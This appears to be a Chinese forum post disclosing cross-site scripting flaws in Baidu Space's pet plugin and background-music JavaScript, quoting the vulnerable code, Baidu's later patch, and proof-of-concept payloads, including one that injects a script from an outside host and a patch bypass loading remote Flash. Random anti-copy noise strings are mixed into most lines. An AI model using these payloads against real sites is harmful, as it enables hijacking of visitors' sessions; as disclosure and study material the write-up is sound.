百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
; n; F, ~% F/ K* h6 B3 Q+ R8 L" v6 W. k' U# Y K, p
1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存.
" T2 k) I' O) u# r& N* F% D8 a5 a2.在http://hi.baidu.com/ui/scripts/pet/pet.js中
5 {8 W7 R+ ]0 B, g! f' V+ b* A/ M/ U3 S0 k7 B9 o0 f0 V1 g
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p>
* o% x, }+ a( m: D其中BdUtil.insertWBR为
! Q; t) b' A+ L) a8 ^function(text, step) { 7 _3 g2 R6 b4 N9 @
var textarea = textAreaCache || getContainer(); 0 g- u* ?! O1 P7 A' m. G
if (!textarea) {
# o1 p9 U' t$ A3 C @3 d6 G return text; % n7 C4 V" L p, A0 \8 W. D
} 0 K% w6 ?5 {/ n5 [6 |" U8 j! ?
textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 8 t0 S5 O; V2 r y# s
var string = textarea.value; * K0 W. q: V7 u
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
K3 ~; n) m* T2 u1 F; I var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); - o) D0 ?8 W& e8 h/ |/ p" w1 F
return result;
2 I$ W) c! }( P- `( g& K z}
3 k; J4 _( [7 E. N, G2 C在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. 6 ~7 ]1 M# B o6 n9 M" ^" G
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)>
0 [* E7 d. c6 z' {" U O' ? 4 B+ O5 y) B6 }3 m& r
二:creatbgmusic() Dom-Xss Bug
2 C$ o; b! m4 S8 B( w百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞 1 y1 b. a" S2 p/ Z% F9 s' ]3 M ~3 n
9 |3 r* M3 Q8 h/ ^" ]6 Y; W
在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: / N# B" Q1 W+ ]$ Y
- n$ p+ m4 e% F4 z+ y4 Ifunction creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { ' x1 a# [1 E5 q \, @* m0 O
//传入的murl赋值到bgmusic1和bgmusic2中
9 L9 R# d6 K6 Q! o //可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1
' S q9 x/ o) s2 a; n" O/ g var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">"; 8 G: j$ R& A: I; b: G
if (musicnum <= 1) { 8 S; P0 J; l, u# c
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; # i8 |" Z+ G* {; T+ T6 A& g
}
5 Y( C% e& m% W/ @2 M bgmusic1 += "</OBJECT>";
- N+ ?" J# _/ Z' [4 b var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\"";
B/ r' ~1 O/ F( B if (musicnum <= 1) { 8 i8 D3 k) s7 ]. I5 i1 n; Z+ E
bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
% d$ C8 H+ Z! p }
x* O" e* [+ E' g bgmusic2 += "> </EMBED>"; * W; F6 O; A; v( W; L
var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>";
" r- z) ^; U! ~, P6 f3 W, [ var bgmus = detectWMP(); # M5 b8 Z) U% O5 Z1 C2 G/ |! a
if (functype == "FckMusicHelper") { - b8 B" O! I7 X9 N. u1 @5 y5 R
if (bgmus.installed) { 3 r( f, t" v; k. W! D/ L" a |! Z
if (bgmus.type == "IE") {
+ `2 n& C) g, f/ ^ return bgmusic1; , V6 B& m; r. s9 b% x, r% }2 b
} else if (bgmus.type == "NS") {
5 V& ` Q8 J3 t% y% r" p return bgmusic2;
. N' z, A& O) ^' N }
1 m& Y! D* m) l7 ~4 T } else {
6 F5 V, H: C* {8 b4 B+ }; G# K return bgmusic3; & h9 P: m3 y0 [5 m
}
, i, K j8 v7 V- o9 l$ n" B" e } else { ' a; n3 l3 c; i/ b2 P
if (bgmus.installed) {
3 @2 M) L9 L/ T z //document.write 直接输出bgmusic变量 导致xss 9 C, _0 D( Y" w
if (bgmus.type == "IE") { 1 v/ u I" A2 T D
document.write(bgmusic1); / S/ t! y: B* C( Z, {( C
} else if (bgmus.type == "NS") {
@$ E$ E. B( G- U$ {- R: E0 l document.write(bgmusic2); / `; T: m2 p: I
}
" _! d$ R B3 l( @, Q8 @, j+ L } else { # j9 |! W! g1 r. {
document.write(bgmusic3); ' j; o, G$ \- `9 G9 |) _* K- I, |
}
8 x q& [& A, m+ {1 M1 X, {$ F return "";
+ q2 [/ S: K( y# C x& }. p2 h }
; e% n7 L7 M3 j' S, i" r; y9 j} * F; k+ s9 F& Q! q" j
) J# r' Q, v$ t n在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下: ( Z$ s7 ]4 r" D9 H
+ `# O1 k7 {+ A6 ^5 gfunction initBlogTextForFCK(){
2 H2 G8 ^2 C" y S: E+ C//fck init music
" q* @: |" r7 }$ @. Z5 b' R- q0 Oif(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}}
* I) e$ L2 h; X( ^+ h. C6 M: fvar imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组 9 ~8 n+ V- [: o) g8 n' I0 Y
var isAutoPlay=true; * m. g) c6 W% u9 G
for(var i=0,n=imgBox.length;i<n;i++){ //然后遍历. , [( h1 {+ @- `9 d
var img=imgBox; 1 k6 K# ~: E3 N$ U- r1 j2 T( G
if(img.getAttribute(’rel’)){ 0 u! N6 Z- R0 y$ U+ u a5 v
var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc , f6 p M; L) C
var musicDiv = document.createElement("SPAN"); : J% w% t4 c% I- r
var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp]
% j$ G# @+ e7 W# f- D
4 ^. F9 k0 ]! } .......................... 4 E, F, q( N! u/ }, u% B+ ?$ i) n
r2 q6 ~/ E: E //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来. 1 W2 N, e! s" T8 \4 e
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); ( q5 G( x) r2 [4 M a* s
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
* f( _1 D( s! c musicDiv.innerHTML=shtml; 2 ^# P- m; y5 {/ A5 \0 }* x# x1 K6 q
i--;n--;
5 r" i C: m# e( C } + S: T# C" s6 _- c. S I
}
2 [$ ?0 o: P/ x- I# ~ Z
" c8 o$ l- C! J7 [; ~从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS.
' | w8 R, q v& P* [" L% m H
- B* q* B1 P$ X# g7 }+ F8 y* D8 u测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/> . L0 L0 z+ d. `
9 S2 K, T! K3 }2 Z0 ^
等待官方补丁
* w6 k0 H# p3 Z4 K7 S) M( R: i% B4 X I0 i# Z5 J1 }, @% _! M
update 2010年5月13日 ) S2 Q: z1 s0 p [
! x9 {1 l1 q, F/ }0 c官方补丁: 5 E6 c. d9 Z+ n7 O* M1 A
1 }4 b" S$ P' xvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
1 j0 ~3 O& q9 c6 j改为: 3 q1 n) x7 e% B
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’);
i4 b5 n* \& Q: ]( Q# Q
) j6 @: x& @! r3 v: w3 Jupdate 2010年5月13日 21:50:37
1 l; I! r5 G. z' p) c5 Z
& l# m! {& |4 f2 y- J* N8 w补丁存在漏洞 没有过滤" 可以继续跨:
6 G0 A' b; ?6 z. Q6 A! u1 q# X* h: E! M6 U5 b& Q7 K e F+ l
NEW POC:
4 i. @! ]: w1 O& W8 G1 ~. q l: X# Q1 J" Y4 @) w( ?6 i: ?: _
<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf"
& f# ]3 s( G n! n7 z$ W7 z3 z- i2 k$ [, ?
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
" q6 g# f6 P5 R( k0 _& r
9 m% r( @3 R7 s* q9 e1 J7 L" G |
发表于 2013-8-24 11:51:11
收藏
支持
反对